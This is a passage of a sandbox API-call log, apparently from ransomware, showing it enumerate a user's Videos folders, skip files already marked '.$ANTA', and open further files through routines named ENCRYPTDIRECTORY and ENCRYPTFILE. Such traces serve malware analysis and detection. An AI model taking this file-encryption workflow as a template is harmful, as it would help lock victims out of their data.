hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0100.647] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.647] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0100.647] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.647] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0100.647] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b8575, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x72b8575, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x740fb9d, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xbc00, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="gOxwTO2-sZ.mp4.$ANTA", cAlternateFileName="GOXWTO~1.$AN")) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0100.647] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.648] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0100.648] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0100.648] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.648] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75b3507, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x75b3507, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x76e48b5, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x16f70, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="NLad7.avi.$ANTA", cAlternateFileName="NLAD7A~1.$AN")) returned 1 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0100.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0100.648] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a0b99c, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x7a0b99c, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x7d79028, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xdea0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="oxSznFWHwYcj-6Y.mkv.$ANTA", cAlternateFileName="OXSZNF~1.$AN")) returned 1 [0100.648] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e37b9c, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x7e37b9c, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x7f8f092, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x18f50, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="rggg9G4RHZvsA0kg01.flv.$ANTA", cAlternateFileName="RGGG9G~1.$AN")) returned 1 [0100.684] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bc1e70, ftCreationTime.dwHighDateTime=0x1d5e767, ftLastAccessTime.dwLowDateTime=0x76577b0, ftLastAccessTime.dwHighDateTime=0x1d5e847, ftLastWriteTime.dwLowDateTime=0x76577b0, ftLastWriteTime.dwHighDateTime=0x1d5e847, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="T H0jeo_wwrX", cAlternateFileName="TH0JEO~1")) returned 1 [0100.684] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x804dcb9, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x804dcb9, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x8132ada, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x4010, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="wJA95KXdyH.flv.$ANTA", cAlternateFileName="WJA95K~1.$AN")) returned 1 [0100.684] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2570, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2570, ftLastWriteTime.dwLowDateTime=0x43ea2e0, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="﬈мńဓ+\x10")) returned 0 [0100.685] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0100.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|T H0jeo_wwrX", cchCount1=13, lpString2="", cchCount2=0) returned 3 [0100.685] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0100.685] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0100.685] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx")) returned 0x10 [0100.685] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\*", lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bc1e70, ftCreationTime.dwHighDateTime=0x1d5e767, ftLastAccessTime.dwLowDateTime=0x76577b0, ftLastAccessTime.dwHighDateTime=0x1d5e847, ftLastWriteTime.dwLowDateTime=0x76577b0, ftLastWriteTime.dwHighDateTime=0x1d5e847, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca430, cFileName=".", cAlternateFileName="")) returned 0x41ac280 [0100.685] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bc1e70, ftCreationTime.dwHighDateTime=0x1d5e767, ftLastAccessTime.dwLowDateTime=0x76577b0, ftLastAccessTime.dwHighDateTime=0x1d5e847, ftLastWriteTime.dwLowDateTime=0x76577b0, ftLastWriteTime.dwHighDateTime=0x1d5e847, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca430, cFileName="..", cAlternateFileName="")) returned 1 [0100.685] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11566390, ftCreationTime.dwHighDateTime=0x1d5f028, ftLastAccessTime.dwLowDateTime=0xe65173c0, ftLastAccessTime.dwHighDateTime=0x1d5ed97, ftLastWriteTime.dwLowDateTime=0xe65173c0, ftLastWriteTime.dwHighDateTime=0x1d5ed97, nFileSizeHigh=0x0, nFileSizeLow=0xb24b, dwReserved0=0x0, dwReserved1=0x43ca430, cFileName="0l3d58qA0oi.mp4", cAlternateFileName="0L3D58~1.MP4")) returned 1 [0100.685] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83ec870, ftCreationTime.dwHighDateTime=0x1d5efe1, ftLastAccessTime.dwLowDateTime=0x8ae48190, ftLastAccessTime.dwHighDateTime=0x1d5ee3b, ftLastWriteTime.dwLowDateTime=0x8ae48190, ftLastWriteTime.dwHighDateTime=0x1d5ee3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="jyNO5NcyIG2nrd", cAlternateFileName="JYNO5N~1")) returned 1 [0100.685] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ba5f170, ftCreationTime.dwHighDateTime=0x1d5e1c0, ftLastAccessTime.dwLowDateTime=0xad79bf20, ftLastAccessTime.dwHighDateTime=0x1d5e96a, ftLastWriteTime.dwLowDateTime=0xad79bf20, ftLastWriteTime.dwHighDateTime=0x1d5e96a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="pNrmbcA", cAlternateFileName="")) returned 1 [0100.685] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c1344d0, ftCreationTime.dwHighDateTime=0x1d5e0cc, ftLastAccessTime.dwLowDateTime=0x94b072b0, ftLastAccessTime.dwHighDateTime=0x1d5eacb, ftLastWriteTime.dwLowDateTime=0x94b072b0, ftLastWriteTime.dwHighDateTime=0x1d5eacb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="tr4gQM", cAlternateFileName="")) returned 1 [0100.686] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e25c0, ftCreationTime.dwHighDateTime=0x144eb40, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e25c0, ftLastWriteTime.dwLowDateTime=0x43ea2e0, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="", cAlternateFileName="мńဓ+\x10")) returned 0 [0100.686] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0100.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|0l3d58qA0oi.mp4", cchCount1=16, lpString2="", cchCount2=0) returned 3 [0100.686] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0100.686] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\0l3d58qA0oi.mp4", lpFindFileData=0x144ebc8 | out: lpFindFileData=0x144ebc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11566390, ftCreationTime.dwHighDateTime=0x1d5f028, ftLastAccessTime.dwLowDateTime=0xe65173c0, ftLastAccessTime.dwHighDateTime=0x1d5ed97, ftLastWriteTime.dwLowDateTime=0xe65173c0, ftLastWriteTime.dwHighDateTime=0x1d5ed97, nFileSizeHigh=0x0, nFileSizeLow=0xb24b, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="0l3d58qA0oi.mp4", cAlternateFileName="0L3D58~1.MP4")) returned 0x41ac500 [0100.686] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0100.686] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0100.686] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0100.686] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0100.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca5c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0100.687] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\0l3d58qA0oi.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\0l3d58qa0oi.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0100.687] FreeLibrary (hLibModule=0x772d0000) returned 1 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0100.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0100.688] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0100.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0100.688] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0100.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0100.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0100.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0100.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0100.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0100.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0100.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0100.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0100.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0100.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0100.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0100.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0100.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0100.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0100.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0100.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0100.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.689] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0100.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0100.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0100.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca3e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0100.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0100.690] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0100.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0100.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0100.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0100.690] CloseHandle (hObject=0x298) returned 1 [0100.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0100.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0100.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0100.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0100.690] RtlAllocateHeap 